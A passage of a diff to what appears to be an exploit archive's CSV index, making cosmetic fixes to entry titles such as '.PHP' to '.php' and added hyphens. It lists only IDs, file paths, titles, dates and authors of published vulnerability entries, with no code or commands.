(2)",1998-08-31,"NAI research team",unix,remote,0 19103,platforms/linux/remote/19103.c,"HP HP-UX <= 10.34_ms Windows 95/NT 3.5.1 SP1/NT 3.5.1 SP2/NT 3.5.1 SP3/NT 3.5.1 SP4/NT 4.0/NT 4.0 SP1/NT 4.0 SP2/NT 4.0 SP3",1997-11-13,"G P R",linux,remote,0 @@ -16727,7 +16727,7 @@ id,file,description,date,author,platform,type,port 19334,platforms/windows/dos/19334.txt,"ACDSee PRO 5.1 CUR Image Processing Heap Overflow",2012-06-22,"Francis Provencher",windows,dos,0 19335,platforms/windows/dos/19335.txt,"XnView 1.98.8 GIF Image Processing Heap Overflow",2012-06-22,"Francis Provencher",windows,dos,0 19336,platforms/windows/dos/19336.txt,"XnView 1.98.8 PCT Image Processing Heap Overflow",2012-06-22,"Francis Provencher",windows,dos,0 -19337,platforms/windows/dos/19337.txt,"XnView 1.98.8 TIFF Image Processing Heap Overflow",2012-06-22,"Francis Provencher",windows,dos,0 +19337,platforms/windows/dos/19337.txt,"XnView 1.98.8 TIFF Image Processing Heap Overflow (1)",2012-06-22,"Francis Provencher",windows,dos,0 19338,platforms/windows/dos/19338.txt,"XnView 1.98.8 TIFF Image Processing Heap Overflow (2)",2012-06-22,"Francis Provencher",windows,dos,0 19339,platforms/windows/webapps/19339.txt,"SoftPerfect Bandwidth Manager 2.9.10 - Authentication Bypass",2012-06-22,Gitsnik,windows,webapps,0 19340,platforms/windows/dos/19340.txt,"Lattice Diamond Programmer 1.4.2 - Buffer Overflow",2012-06-22,"Core Security",windows,dos,0 @@ -16968,7 +16968,7 @@ id,file,description,date,author,platform,type,port 19600,platforms/php/webapps/19600.txt,"CLscript CMS 3.0 - Multiple Vulnerabilities",2012-07-05,Vulnerability-Lab,php,webapps,0 19603,platforms/windows/remote/19603.txt,"Microsoft Internet Explorer 4.x/5.0_Outlook 2000 0/98 0/Express 4.x - ActiveX CAB File Execution",1999-11-08,Mukund,windows,remote,0 20122,platforms/windows/remote/20122.rb,"Microsoft Office SharePoint Server 2007 - Remote Code Execution",2012-07-31,metasploit,windows,remote,8082 -30094,platforms/php/webapps/30094.txt,"DGNews 2.1 Footer.PHP Cross-Site Scripting Vulnerability",2007-05-28,"Jesper Jurcenoks",php,webapps,0 +30094,platforms/php/webapps/30094.txt,"DGNews 2.1 Footer.php Cross-Site Scripting Vulnerability",2007-05-28,"Jesper Jurcenoks",php,webapps,0 20120,platforms/windows/remote/20120.pl,"httpdx <= 1.5.4 - Remote Heap Overflow",2012-07-29,st3n,windows,remote,0 19605,platforms/linux/dos/19605.c,"Linux Kernel <= 3.2.24 - fs/eventpoll.c Local Denial of Service",2012-07-05,"Yurij M. Plotnikov",linux,dos,0 19903,platforms/multiple/remote/19903.txt,"Gossamer Threads DBMan 2.0.4 DBMan Information Leakage Vulnerability",2000-05-05,"Black Watch Labs",multiple,remote,0 @@ -18242,7 +18242,7 @@ id,file,description,date,author,platform,type,port 20945,platforms/solaris/local/20945.txt,"Sun SunVTS 4.x PTExec Buffer Overflow Vulnerability",2001-06-21,"Pablo Sor",solaris,local,0 20946,platforms/windows/dos/20946.txt,"Cerberus FTP Server 1.x - Buffer Overflow DoS Vulnerability",2001-06-21,"Cartel Informatique Security Research Labs",windows,dos,0 20947,platforms/windows/remote/20947.txt,"1C: Arcadia Internet Store 1.0 - Arbitrary File Disclosure Vulnerability",2001-06-21,ViperSV,windows,remote,0 -20948,platforms/windows/remote/20948.txt,"1C: Arcadia Internet Store 1.0 Show Path Vulnerability",2001-06-21,ViperSV,windows,remote,0 +20948,platforms/windows/remote/20948.txt,"1C: Arcadia Internet Store 1.0 - Show Path Vulnerability",2001-06-21,ViperSV,windows,remote,0 20949,platforms/windows/dos/20949.c,"1C: Arcadia Internet Store 1.0 - Denial of Service Vulnerability",2001-06-21,"NERF Security",windows,dos,0 20950,platforms/windows/remote/20950.c,"Microsoft Visual Studio RAD Support Buffer Overflow Vulnerability",2001-06-21,"NSFOCUS Security Team",windows,remote,0 20951,platforms/windows/remote/20951.pm,"Microsoft Visual Studio RAD Support Buffer Overflow Vulnerability (Metasploit)",2001-06-21,"NSFOCUS Security Team",windows,remote,0 @@ -18253,7 +18253,7 @@ id,file,description,date,author,platform,type,port 20957,platforms/windows/dos/20957.pl,"WarFTP Daemon 1.82 RC 11 - Remote Format String Vulnerability",2012-08-31,coolkaveh,windows,dos,0 21017,platforms/linux/remote/21017.txt,"Squid Web Proxy 2.3 Reverse Proxy Vulnerability",2001-07-18,"Paul Nasrat",linux,remote,0 21018,platforms/unix/remote/21018.c,"Solaris 2.x/7.0/8_IRIX 6.5.x_OpenBSD 2.x_NetBSD 1.x_Debian 3_HP-UX 10 Telnetd Buffer Overflow",2001-07-18,Dvorak,unix,remote,0 -20959,platforms/windows/webapps/20959.py,"OTRS Open Technology Real Services 3.1.8 and 3.1.9 - XSS Vulnerability",2012-08-31,"Mike Eduard",windows,webapps,0 +20959,platforms/windows/webapps/20959.py,"OTRS Open Technology Real Services 3.1.8 / 3.1.9 - XSS Vulnerability",2012-08-31,"Mike Eduard",windows,webapps,0 20960,platforms/unix/local/20960.c,"Juergen Schoenwaelder scotty 2.1.x ntping Buffer Overflow Vulnerability",2001-06-13,"Larry W. Cashdollar",unix,local,0 20961,platforms/unix/local/20961.sh,"KDE KTVision 0.1 File Overwrite Vulnerability",2001-06-21,IhaQueR,unix,local,0 20962,platforms/unix/local/20962.pl,"cfingerd 1.4.1/1.4.2/1.4.3 Utilities Buffer Overflow Vulnerability (1)",2001-06-21,teleh0r,unix,local,0 @@ -18468,7 +18468,7 @@ id,file,description,date,author,platform,type,port 21183,platforms/cgi/remote/21183.txt,"webmin 0.91 - Directory Traversal Vulnerability",2001-12-17,"A. Ramos",cgi,remote,0 21184,platforms/cgi/webapps/21184.txt,"Agora.CGI 3.x/4.0 Debug Mode Cross-Site Scripting Vulnerability",2001-12-17,"Tamer Sahin",cgi,webapps,0 21185,platforms/unix/remote/21185.sh,"QPopper 4.0.x PopAuth Trace File Shell Command Execution Vulnerability",2001-12-18,IhaQueR,unix,remote,0 -21186,platforms/hardware/remote/21186.txt,"ZyXEL Prestige 681 SDSL Router IP Fragment Reassembly Vulnerability",2001-12-18,"Przemyslaw Frasunek",hardware,remote,0 +21186,platforms/hardware/remote/21186.txt,"ZyXEL Prestige 681 SDSL Router - IP Fragment Reassembly Vulnerability",2001-12-18,"Przemyslaw Frasunek",hardware,remote,0 21187,platforms/cgi/webapps/21187.txt,"Aktivate 1.0 3 Shopping Cart Cross-Site Scripting Vulnerability",2001-12-18,"Tamer Sahin",cgi,webapps,0 21188,platforms/windows/remote/21188.c,"Windows 98/XP/ME UPnP NOTIFY Buffer Overflow Vulnerability (1)",2001-12-20,"Gabriel Maggiotti",windows,remote,0 21189,platforms/windows/remote/21189.c,"Windows 98/XP/ME UPnP NOTIFY Buffer Overflow Vulnerability (2)",2001-12-20,JOCANOR,windows,remote,0 @@ -18489,7 +18489,7 @@ id,file,description,date,author,platform,type,port 21203,platforms/windows/remote/21203.txt,"Lucent 8.x VitalNet Password Authentication Bypass Vulnerability",2002-01-16,"Mark Cooper",windows,remote,0 21204,platforms/windows/remote/21204.txt,"Apache 1.3.20 - Win32 PHP.EXE Remote File Disclosure Vulnerability",2002-01-04,"Paul Brereton",windows,remote,0 21205,platforms/linux/remote/21205.c,"Boozt 0.9.8 - Buffer Overflow Vulnerability",2002-01-07,"Rafael San Miguel Carrasco",linux,remote,0 -21206,platforms/php/webapps/21206.txt,"PHP-Nuke AddOn PHPToNuke.PHP 1.0 - Cross-Site Scripting Vulnerability",2002-01-06,frog,php,webapps,0 +21206,platforms/php/webapps/21206.txt,"PHP-Nuke AddOn PHPToNuke.php 1.0 - Cross-Site Scripting Vulnerability",2002-01-06,frog,php,webapps,0 21207,platforms/windows/remote/21207.c,"RealPlayer 7.0/8.0 Media File Buffer Overflow Vulnerability",2002-01-05,UNYUN,windows,remote,0 21208,platforms/cgi/webapps/21208.txt,"YaBB 9.1.2000 - Cross-Agent Scripting Vulnerability",2002-01-09,Obscure,cgi,webapps,0 21209,platforms/cgi/webapps/21209.txt,"Ultimate Bulletin Board 5.4/6.0/6.2 - Cross-Agent Scripting Vulnerability",2002-01-09,Obscure,cgi,webapps,0 @@ -18557,8 +18557,8 @@ id,file,description,date,author,platform,type,port 21274,platforms/windows/remote/21274.c,"MIRC 2.x/3.x/4.x/5.x Nick Buffer Overflow Vulnerability",2002-02-03,"James Martin",windows,remote,0 21275,platforms/osx/dos/21275.c,"ICQ For MacOS X 2.6 Client Denial of Service Vulnerability",2002-02-05,Stephen,osx,dos,0 21276,platforms/multiple/remote/21276.txt,"Thunderstone TEXIS 3.0 Path Disclosure Vulnerability",2002-02-06,phinegeek,multiple,remote,0 -21277,platforms/php/webapps/21277.txt,"Portix-PHP 0.4 Index.PHP Directory Traversal Vulnerability",2002-02-04,frog,php,webapps,0 -21278,platforms/php/webapps/21278.txt,"Portix-PHP 0.4 View.PHP Directory Traversal Vulnerability",2002-02-04,frog,php,webapps,0 +21277,platforms/php/webapps/21277.txt,"Portix-PHP 0.4 Index.php Directory Traversal Vulnerability",2002-02-04,frog,php,webapps,0 +21278,platforms/php/webapps/21278.txt,"Portix-PHP 0.4 View.php Directory Traversal Vulnerability",2002-02-04,frog,php,webapps,0 21279,platforms/php/webapps/21279.txt,"Portix-PHP 0.4 Cookie Manipulation Vulnerability",2002-02-04,frog,php,webapps,0 21280,platforms/linux/local/21280.c,"Hanterm 3.3 - Local Buffer Overflow Vulnerability (1)",2002-02-07,Xpl017Elz,linux,local,0 21281,platforms/linux/local/21281.c,"Hanterm 3.3 - Local Buffer Overflow Vulnerability (2)",2002-02-07,xperc,linux,local,0 @@ -18834,7 +18834,7 @@ id,file,description,date,author,platform,type,port 21558,platforms/cgi/webapps/21558.txt,"My Postcards 6.0 - MagicCard.CGI Arbitrary File Disclosure Vulnerability",2002-06-15,cult,cgi,webapps,0 21559,platforms/multiple/remote/21559.c,"Apache 1.x/2.0.x Chunked-Encoding Memory Corruption Vulnerability (1)",2002-06-17,"Gobbles Security",multiple,remote,0 21560,platforms/multiple/remote/21560.c,"Apache 1.x/2.0.x Chunked-Encoding Memory Corruption Vulnerability (2)",2002-06-17,"Gobbles Security",multiple,remote,0 -21561,platforms/hardware/dos/21561.txt,"Zyxel Prestige 642R Malformed Packet Denial of Service Vulnerability",2002-07-17,"Kistler Ueli",hardware,dos,0 +21561,platforms/hardware/dos/21561.txt,"ZyXEL Prestige 642R - Malformed Packet Denial of Service Vulnerability",2002-07-17,"Kistler Ueli",hardware,dos,0 21562,platforms/java/webapps/21562.txt,"Wolfram Research webMathematica 4.0 File Disclosure Vulnerability",2002-06-17,"Andrew Badr",java,webapps,0 21563,platforms/php/webapps/21563.txt,"OSCommerce 2.1 - Remote File Include Vulnerability",2002-06-16,"Tim Vandermeerch",php,webapps,0 21564,platforms/php/webapps/21564.txt,"PHP-Address 0.2 e Remote File Include Vulnerability",2002-06-17,"Tim Vandermeerch",php,webapps,0 @@ -18911,7 +18911,7 @@ id,file,description,date,author,platform,type,port 21634,platforms/windows/dos/21634.c,"SecureCRT 2.4/3.x/4.0 SSH1 Identifier String Buffer Overflow Vulnerability (1)",2002-07-23,Kyuzo,windows,dos,0 21635,platforms/windows/remote/21635.c,"SecureCRT 2.4/3.x/4.0 SSH1 Identifier String Buffer Overflow Vulnerability (2)",2002-07-23,"andrea lisci",windows,remote,0 21636,platforms/windows/remote/21636.txt,"Opera 6.0.1_Microsoft Internet Explorer 5/6 - JavaScript Modifier Keypress Event Subversion Vulnerability",2002-07-23,"Andreas Sandblad",windows,remote,0 -21637,platforms/hardware/dos/21637.c,"Zyxel Prestige 642R Router Malformed IP Packet Denial of Service Vulnerability",2002-07-24,"Jeff w. Roberson",hardware,dos,0 +21637,platforms/hardware/dos/21637.c,"ZyXEL Prestige 642R Router - Malformed IP Packet Denial of Service Vulnerability",2002-07-24,"Jeff w. Roberson",hardware,dos,0 21638,platforms/multiple/remote/21638.txt,"Mozilla 0.9.x/1.0 JavaScript URL Host Spoofing Arbitrary Cookie Access Vulnerability",2002-07-24,"Andreas Sandblad",multiple,remote,0 21639,platforms/windows/remote/21639.c,"VMWare GSX Server 2.0 - Authentication Server Buffer Overflow Vulnerability",2002-07-24,"Zag & Glcs",windows,remote,0 21640,platforms/php/webapps/21640.txt,"Cobalt Qube 3.0 - Authentication Bypass Vulnerability",2002-07-24,pokley,php,webapps,0 @@ -19008,7 +19008,7 @@ id,file,description,date,author,platform,type,port 21735,platforms/windows/remote/21735.txt,"Abyss Web Server 1.0 Encoded Backslash Directory Traversal Vulnerability",2002-08-22,"Auriemma Luigi",windows,remote,0 21736,platforms/hardware/dos/21736.txt,"LG LR3100p 1.30 Series Router IP Packet Flags Denial of Service Vulnerability",2002-08-22,"Lukasz Bromirski",hardware,dos,0 21737,platforms/windows/dos/21737.txt,"Cyme ChartFX Client Server ActiveX Control Array Indexing Vulnerability",2012-10-04,"Francis Provencher",windows,dos,0 -21834,platforms/php/webapps/21834.rb,"phpMyAdmin 3.5.2.2 server_sync.php Backdoor",2012-10-10,metasploit,php,webapps,0 +21834,platforms/php/webapps/21834.rb,"phpMyAdmin 3.5.2.2 - server_sync.php Backdoor",2012-10-10,metasploit,php,webapps,0 21739,platforms/windows/dos/21739.pl,"JPEGsnoop <= 1.5.2 WriteAV Crash PoC",2012-10-04,"Jean Pascal Pereira",windows,dos,0 21740,platforms/php/webapps/21740.txt,"phpmychat plus 1.94 rc1 - Multiple Vulnerabilities",2012-10-04,L0n3ly-H34rT,php,webapps,0 21741,platforms/windows/dos/21741.txt,"XnView 1.99.1 JLS File Decompression Heap Overflow",2012-10-04,"Joseph Sheridan",windows,dos,0 @@ -19091,7 +19091,7 @@ id,file,description,date,author,platform,type,port 21883,platforms/windows/remote/21883.html,"Microsoft Internet Explorer 5 Document Reference Zone Bypass Vulnerability",2002-10-01,"Liu Die Yu",windows,remote,0 21884,platforms/unix/local/21884.txt,"Sendmail 8.12.x SMRSH Double Pipe Access Validation Vulnerability",2002-10-01,zen-parse,unix,local,0 21885,platforms/multiple/remote/21885.txt,"Apache 1.3/2.0.x - Server Side Include Cross-Site Scripting Vulnerability",2002-10-02,mattmurphy,multiple,remote,0 -21886,platforms/php/webapps/21886.txt,"Py-Membres 3.1 Index.PHP Unauthorized Access Vulnerability",2002-10-02,frog,php,webapps,0 +21886,platforms/php/webapps/21886.txt,"Py-Membres 3.1 Index.php Unauthorized Access Vulnerability",2002-10-02,frog,php,webapps,0 21821,platforms/windows/dos/21821.c,"Trillian 0.74 - IRC PART Message Denial of Service Vulnerability",2002-09-22,"Lance Fitz-Herbert",windows,dos,0 21881,platforms/bsd/local/21881.txt,"Rogue 5.3 - Local Buffer Overflow Vulnerability",2002-09-30,stanojr@iserver.sk,bsd,local,0 21822,platforms/multiple/webapps/21822.txt,"Endpoint Protector 4.0.4.0 - Multiple Vulnerabilities",2012-10-09,Vulnerability-Lab,multiple,webapps,0 @@ -19131,7 +19131,7 @@ id,file,description,date,author,platform,type,port 21859,platforms/php/webapps/21859.txt,"PHP-Nuke 6.0 - News Message HTML Injection Vulnerability",2002-09-25,das@hush.com,php,webapps,0 21860,platforms/php/webapps/21860.txt,"NPDS 4.8 News Message HTML Injection Vulnerability",2002-09-25,das@hush.com,php,webapps,0 21861,platforms/php/webapps/21861.txt,"DaCode 1.2 News Message HTML Injection Vulnerability",2002-09-25,das@hush.com,php,webapps,0 -21862,platforms/php/webapps/21862.txt,"PHP-Nuke 6.0 - Modules.PHP SQL Injection Vulnerability",2002-09-25,"Pedro Inacio",php,webapps,0 +21862,platforms/php/webapps/21862.txt,"PHP-Nuke 6.0 - Modules.php SQL Injection Vulnerability",2002-09-25,"Pedro Inacio",php,webapps,0 21863,platforms/php/webapps/21863.txt,"Drupal 4.0 News Message HTML Injection Vulnerability",2002-09-25,das@hush.com,php,webapps,0 21864,platforms/php/webapps/21864.txt,"PHPWebSite 0.8.3 News Message HTML Injection Vulnerability",2002-09-25,das@hush.com,php,webapps,0 21865,platforms/linux/local/21865.c,"Interbase 5/6 GDS_Lock_MGR UMask File Permission Changing Vulnerability",2002-09-25,grazer,linux,local,0 @@ -19142,8 +19142,8 @@ id,file,description,date,author,platform,type,port 21870,platforms/linux/remote/21870.txt,"Zope 2.x Incorrect XML-RPC Request Information Disclosure Vulnerability",2002-09-26,"Rossen Raykov",linux,remote,0 21871,platforms/linux/local/21871.c,"GV 2.x/3.x Malformed PDF/PS File Buffer Overflow Vulnerability (1)",2002-09-26,zen-parse,linux,local,0 21872,platforms/linux/local/21872.c,"GV 2.x/3.x Malformed PDF/PS File Buffer Overflow Vulnerability (2)",2002-09-26,infamous42md,linux,local,0 -21873,platforms/php/webapps/21873.txt,"PostNuke 0.72 Modules.PHP Cross-Site Scripting Vulnerability",2002-09-26,"Mark Grimes",php,webapps,0 -21874,platforms/php/webapps/21874.txt,"VBulletin 2.0.3 Calendar.PHP Command Execution Vulnerability",2002-09-27,gosper,php,webapps,0 +21873,platforms/php/webapps/21873.txt,"PostNuke 0.72 Modules.php Cross-Site Scripting Vulnerability",2002-09-26,"Mark Grimes",php,webapps,0 +21874,platforms/php/webapps/21874.txt,"VBulletin 2.0.3 Calendar.php Command Execution Vulnerability",2002-09-27,gosper,php,webapps,0 21875,platforms/jsp/webapps/21875.txt,"Jetty 4.1 Servlet Engine Cross-Site Scripting Vulnerability",2002-09-28,Skinnay,jsp,webapps,0 21876,platforms/multiple/remote/21876.txt,"SafeTP 1.46 Passive Mode Internal IP Address Revealing Vulnerability",2002-09-28,"Jonathan G. Lampe",multiple,remote,0 21877,platforms/cgi/webapps/21877.txt,"EmuMail 5.0 Web Root Path Disclosure Vulnerability",2002-09-29,FVS,cgi,webapps,0 @@ -19161,7 +19161,7 @@ id,file,description,date,author,platform,type,port 21896,platforms/php/webapps/21896.txt,"Midicart PHP Arbitrary File Upload Vulnerability",2002-10-02,frog,php,webapps,0 21897,platforms/windows/remote/21897.txt,"SurfControl SuperScout WebFilter for windows 2000 File Disclosure Vulnerability",2002-10-02,"Matt Moore",windows,remote,0 21898,platforms/windows/remote/21898.txt,"SurfControl SuperScout WebFilter for windows 2000 SQL Injection Vulnerability",2002-10-02,"Matt Moore",windows,remote,0 -21899,platforms/php/webapps/21899.txt,"PHPWebSite 0.8.3 Article.PHP Cross-Site Scripting Vulnerability",2002-10-02,Sp.IC,php,webapps,0 +21899,platforms/php/webapps/21899.txt,"PHPWebSite 0.8.3 Article.php Cross-Site Scripting Vulnerability",2002-10-02,Sp.IC,php,webapps,0 21900,platforms/php/webapps/21900.txt,"MySimpleNews 1.0 PHP Injection Vulnerability",2002-10-02,frog,php,webapps,0 21901,platforms/php/webapps/21901.txt,"MySimpleNews 1.0 - Remotely Readable Administrator Password Vulnerability",2002-10-02,frog,php,webapps,0 21902,platforms/windows/remote/21902.c,"Microsoft Windows 2000/XP/NT 4 - Help Facility ActiveX Control Buffer Overflow",2002-10-07,ipxodi,windows,remote,0 @@ -19189,11 +19189,11 @@ id,file,description,date,author,platform,type,port 21925,platforms/asp/webapps/21925.txt,"SurfControl SuperScout Email Filter 3.5 User Credential Disclosure Vulnerability",2002-10-08,ken@FTU,asp,webapps,0 21926,platforms/cgi/webapps/21926.txt,"Authoria HR Suite AthCGI.EXE Cross-Site Scripting Vulnerability",2002-10-09,Max,cgi,webapps,0 21927,platforms/multiple/remote/21927.rb,"Metasploit < 4.4 - pcap_log Plugin Privilege Escalation Exploit",2012-10-12,0a29406d9794e4f9b30b3c5d6702c708,multiple,remote,0 -21930,platforms/php/webapps/21930.txt,"PHPReactor 1.2.7 pl1 Browse.PHP Cross-Site Scripting Vulnerability",2002-10-10,"Arab VieruZ",php,webapps,0 +21930,platforms/php/webapps/21930.txt,"PHPReactor 1.2.7 pl1 Browse.php Cross-Site Scripting Vulnerability",2002-10-10,"Arab VieruZ",php,webapps,0 21929,platforms/php/webapps/21929.rb,"Project Pier Arbitrary File Upload Vulnerability",2012-10-16,metasploit,php,webapps,0 21931,platforms/php/webapps/21931.txt,"PHPBBMod 1.3.3 PHPInfo Information Disclosure Vulnerability",2002-10-10,"Roland Verlander",php,webapps,0 21932,platforms/windows/remote/21932.pl,"Microsoft Outlook Express 5.5/6.0 S/MIME Buffer Overflow Vulnerability",2002-10-10,"Noam Rathaus",windows,remote,0 -21933,platforms/php/webapps/21933.txt,"PHPRank 1.8 Add.PHP Cross-Site Scripting Vulnerability",2002-10-10,"Jedi/Sector One",php,webapps,0 +21933,platforms/php/webapps/21933.txt,"PHPRank 1.8 Add.php Cross-Site Scripting Vulnerability",2002-10-10,"Jedi/Sector One",php,webapps,0 21934,platforms/linux/remote/21934.txt,"KDE 3.0.x KPF Icon Option File Disclosure Vulnerability",2002-10-11,"Ajay R Ramjatan",linux,remote,0 21935,platforms/windows/dos/21935.txt,"My Web Server 1.0.1/1.0.2 Long Get Request Denial of Service Vulnerability",2002-10-12,"Marc Ruef",windows,dos,0 21936,platforms/linux/remote/21936.c,"ATP httpd 0.4 Single Byte Buffer Overflow Vulnerability",2002-10-05,thread,linux,remote,0 @@ -19221,7 +19221,7 @@ id,file,description,date,author,platform,type,port 21958,platforms/windows/remote/21958.txt,"AOL Instant Messenger 4.8.2790 - Local File Execution Vulnerability",2002-10-22,"Blud Clot",windows,remote,0 21959,platforms/windows/remote/21959.txt,"Microsoft Internet Explorer 5/6 Cached Objects Zone Bypass Vulnerability",2002-10-22,"GreyMagic Software",windows,remote,0 21960,platforms/php/webapps/21960.txt,"gBook 1.4 Administrative Access Vulnerability",2002-10-22,frog,php,webapps,0 -21961,platforms/php/webapps/21961.txt,"MyMarket 1.71 Form_Header.PHP Cross-Site Scripting Vulnerability",2002-10-23,qber66,php,webapps,0 +21961,platforms/php/webapps/21961.txt,"MyMarket 1.71 Form_Header.php Cross-Site Scripting Vulnerability",2002-10-23,qber66,php,webapps,0 21962,platforms/cgi/webapps/21962.txt,"Mojo Mail 2.7 Email Form Cross-Site Scripting Vulnerability",2002-10-24,"Daniel Boland",cgi,webapps,0 21963,platforms/windows/dos/21963.pl,"SolarWinds TFTP Server Standard Edition 5.0.55 - Large UDP Packet Vulnerability",2002-10-24,D4rkGr3y,windows,dos,0 21964,platforms/windows/remote/21964.txt,"Solarwinds TFTP Server Standard Edition 5.0.55 - Directory Traversal Vulnerability",2002-10-25,"Matthew Murphy",windows,remote,0 @@ -19237,7 +19237,7 @@ id,file,description,date,author,platform,type,port 21974,platforms/unix/remote/21974.pl,"LPRNG html2ps 1.0 - Remote Command Execution Vulnerability",2002-10-31,"Sebastian Krahmer",unix,remote,0 21975,platforms/hardware/dos/21975.txt,"Linksys BEFSR41 1.4x Gozila.CGI Denial of Service Vulnerability",2002-11-01,"Jeep 94",hardware,dos,0 21976,platforms/php/webapps/21976.txt,"Jason Orcutt Prometheus 3.0/4.0/6.0 - Remote File Include Vulnerability",2002-11-01,"Karol Wiesek",php,webapps,0 -21977,platforms/php/webapps/21977.txt,"PHP-Nuke 5.6 Modules.PHP SQL Injection Vulnerability",2002-11-01,kill9,php,webapps,0 +21977,platforms/php/webapps/21977.txt,"PHP-Nuke 5.6 Modules.php SQL Injection Vulnerability",2002-11-01,kill9,php,webapps,0 21978,platforms/hardware/dos/21978.txt,"Linksys WAP11 1.3/1.4_D-Link DI-804 4.68/Dl-704 2.56 b5 Embedded HTTP Server DoS Vulnerability",2002-11-01,"Mark Litchfield",hardware,dos,0 21979,platforms/cgi/webapps/21979.txt,"ION Script 1.4 - Remote File Disclosure Vulnerability",2002-11-01,"Zero X",cgi,webapps,0 21980,platforms/linux/local/21980.c,"Abuse 2.0 - Local Buffer Overflow Vulnerability",2002-11-01,Girish,linux,local,0 @@ -19288,7 +19288,7 @@ id,file,description,date,author,platform,type,port 22027,platforms/windows/remote/22027.txt,"Microsoft Java Virtual Machine 3802 Series - Bytecode Verifier Vulnerability",2002-11-21,"Last Stage of Delirium",windows,remote,0 22028,platforms/windows/remote/22028.txt,"Symantec Java! JustInTime Compiler 210.65 Command Execution Vulnerability",2002-11-21,"Last Stage of Delirium",windows,remote,0 22029,platforms/multiple/remote/22029.txt,"Sun/Netscape Java Virtual Machine1.x Bytecode Verifier Vulnerability",2002-11-21,"Last Stage of Delirium",multiple,remote,0 -22030,platforms/php/webapps/22030.php,"VBulletin 2.0/2.2.x Memberlist.PHP Cross-Site Scripting Vulnerability",2002-11-22,Sp.IC,php,webapps,0 +22030,platforms/php/webapps/22030.php,"VBulletin 2.0/2.2.x Memberlist.php Cross-Site Scripting Vulnerability",2002-11-22,Sp.IC,php,webapps,0 22031,platforms/unix/dos/22031.txt,"Rational ClearCase 4.1 Portscan Denial of Service Vulnerability",2002-11-22,"Stefan Bagdohn",unix,dos,0 22032,platforms/windows/remote/22032.txt,"acFTP 1.4 Invalid Password Weak Authentication Vulnerability",2002-11-25,"Matthew Murphy",windows,remote,0 22033,platforms/linux/dos/22033.txt,"WSMP3 0.0.1/0.0.2 - Multiple Buffer Overflow Vulnerabilities",2002-11-25,"dong-h0un U",linux,dos,0 @@ -19331,8 +19331,8 @@ id,file,description,date,author,platform,type,port 22070,platforms/windows/webapps/22070.py,"otrs 3.1 - Stored XSS Vulnerability",2012-10-18,"Mike Eduard",windows,webapps,0 22071,platforms/php/webapps/22071.txt,"FireStorm Professional Real Estate WordPress Plugin 2.06.01 - SQL Injection Vulnerability",2012-10-18,"Ashiyane Digital Security Team",php,webapps,0 22074,platforms/osx/dos/22074.txt,"Apple Mac OS X 10.2.2 - Directory Kernel Panic Denial of Service",2002-11-07,shibby,osx,dos,0 -22075,platforms/php/webapps/22075.txt,"Ultimate PHP Board 1.0 final beta ViewTopic.PHP Directory Contents Browsing",2002-11-08,euronymous,php,webapps,0 -22076,platforms/php/webapps/22076.txt,"Ultimate PHP Board Board 1.0 final beta ViewTopic.PHP Cross-Site Scripting Vulnerability",2002-11-08,euronymous,php,webapps,0 +22075,platforms/php/webapps/22075.txt,"Ultimate PHP Board 1.0 final beta ViewTopic.php Directory Contents Browsing",2002-11-08,euronymous,php,webapps,0 +22076,platforms/php/webapps/22076.txt,"Ultimate PHP Board Board 1.0 final beta ViewTopic.php Cross-Site Scripting Vulnerability",2002-11-08,euronymous,php,webapps,0 22077,platforms/php/webapps/22077.txt,"vBulletin 2.2.7/2.2.8 HTML Injection Vulnerability",2002-11-09,"Dorin Balanica",php,webapps,0 22078,platforms/windows/remote/22078.txt,"mollensoft software enceladus server suite 2.6.1/3.9 - Directory Traversal",2002-11-09,luca.ercoli@inwind.it,windows,remote,0 22079,platforms/linux/dos/22079.sh,"ProFTPD 1.2.x - STAT Command Denial of Service Vulnerability",2002-12-09,"Rob klein Gunnewiek",linux,dos,0 @@ -19342,7 +19342,7 @@ id,file,description,date,author,platform,type,port 22083,platforms/php/webapps/22083.txt,"Deerfield VisNetic WebSite 3.5.13.1 - Cross-Site Scripting Vulnerability",2002-12-12,"Ory Segal",php,webapps,0 22084,platforms/unix/remote/22084.c,"MySQL 3.23.x/4.0.x COM_CHANGE_USER Password Length Account Compromise Vulnerability",2002-12-16,Andi,unix,remote,0 22085,platforms/unix/remote/22085.txt,"MySQL 3.23.x/4.0.x COM_CHANGE_USER Password Memory Corruption Vulnerability",2002-12-12,"Stefan Esser",unix,remote,0 -22086,platforms/php/webapps/22086.txt,"Mambo Site Server 4.0.11 PHPInfo.PHP Information Disclosure Vulnerability",2002-12-12,euronymous,php,webapps,0 +22086,platforms/php/webapps/22086.txt,"Mambo Site Server 4.0.11 PHPInfo.php Information Disclosure Vulnerability",2002-12-12,euronymous,php,webapps,0 22087,platforms/php/webapps/22087.txt,"Mambo Site Server 4.0.11 Path Disclosure Vulnerability",2002-12-12,euronymous,php,webapps,0 22088,platforms/php/webapps/22088.txt,"MyPHPSoft MyPHPLinks 2.1.9/2.2 - SQL Injection Administration Bypassing",2002-12-14,frog,php,webapps,0 22089,platforms/php/webapps/22089.txt,"PHP-Nuke 6.0 Web Mail Remote PHP Script Execution Vulnerability",2002-12-16,"Ulf Harnhammar",php,webapps,0 @@ -19363,8 +19363,8 @@ id,file,description,date,author,platform,type,port 22106,platforms/linux/remote/22106.txt,"CUPS 1.1.x Negative Length HTTP Header Vulnerability",2002-12-19,iDefense,linux,remote,0 22107,platforms/php/webapps/22107.txt,"SPGPartenaires 3.0.1 ident.php SQL Injection",2002-12-20,frog,php,webapps,0 22108,platforms/php/webapps/22108.txt,"SPGPartenaires 3.0.1 delete.php SQL Injection",2002-12-20,frog,php,webapps,0 -22109,platforms/php/webapps/22109.txt,"W-Agora 4.1.6 EditForm.PHP Cross-Site Scripting Vulnerability",2002-12-22,xatr0z,php,webapps,0 -22110,platforms/php/dos/22110.txt,"PHP-Nuke 6.0 - Modules.PHP Denial of Service Vulnerability",2002-12-23,"Ing. Bernardo Lopez",php,dos,0 +22109,platforms/php/webapps/22109.txt,"W-Agora 4.1.6 EditForm.php Cross-Site Scripting Vulnerability",2002-12-22,xatr0z,php,webapps,0 +22110,platforms/php/dos/22110.txt,"PHP-Nuke 6.0 - Modules.php Denial of Service Vulnerability",2002-12-23,"Ing. Bernardo Lopez",php,dos,0 22111,platforms/cgi/webapps/22111.pl,"CHETCPASSWD 1.12 Shadow File Disclosure Vulnerability",2002-12-22,"Victor Pereira",cgi,webapps,0 22112,platforms/windows/remote/22112.txt,"PlatinumFTPServer 1.0.6 Information Disclosure Vulnerability",2002-12-30,"Dennis Rand",windows,remote,0 22113,platforms/windows/remote/22113.txt,"PlatinumFTPServer 1.0.6 - Arbitrary File Deletion Vulnerability",2002-12-30,"Dennis 